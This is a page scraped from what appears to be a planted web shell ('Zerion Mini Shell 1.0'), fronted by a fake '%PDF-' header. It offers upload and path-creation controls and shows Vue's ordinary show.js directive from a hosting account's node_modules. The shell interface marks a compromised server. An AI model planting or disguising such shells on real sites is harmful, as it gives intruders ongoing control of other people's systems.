%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/ugotscom/3vfm3/node_modules/vue/src/platforms/web/server/directives/
Upload File :
Create Path :
Current File : /home/ugotscom/3vfm3/node_modules/vue/src/platforms/web/server/directives/show.js

/* @flow */

export default function show (node: VNodeWithData, dir: VNodeDirective) {
  if (!dir.value) {
    const style: any = node.data.style || (node.data.style = {})
    if (Array.isArray(style)) {
      style.push({ display: 'none' })
    } else {
      style.display = 'none'
    }
  }
}

Zerion Mini Shell 1.0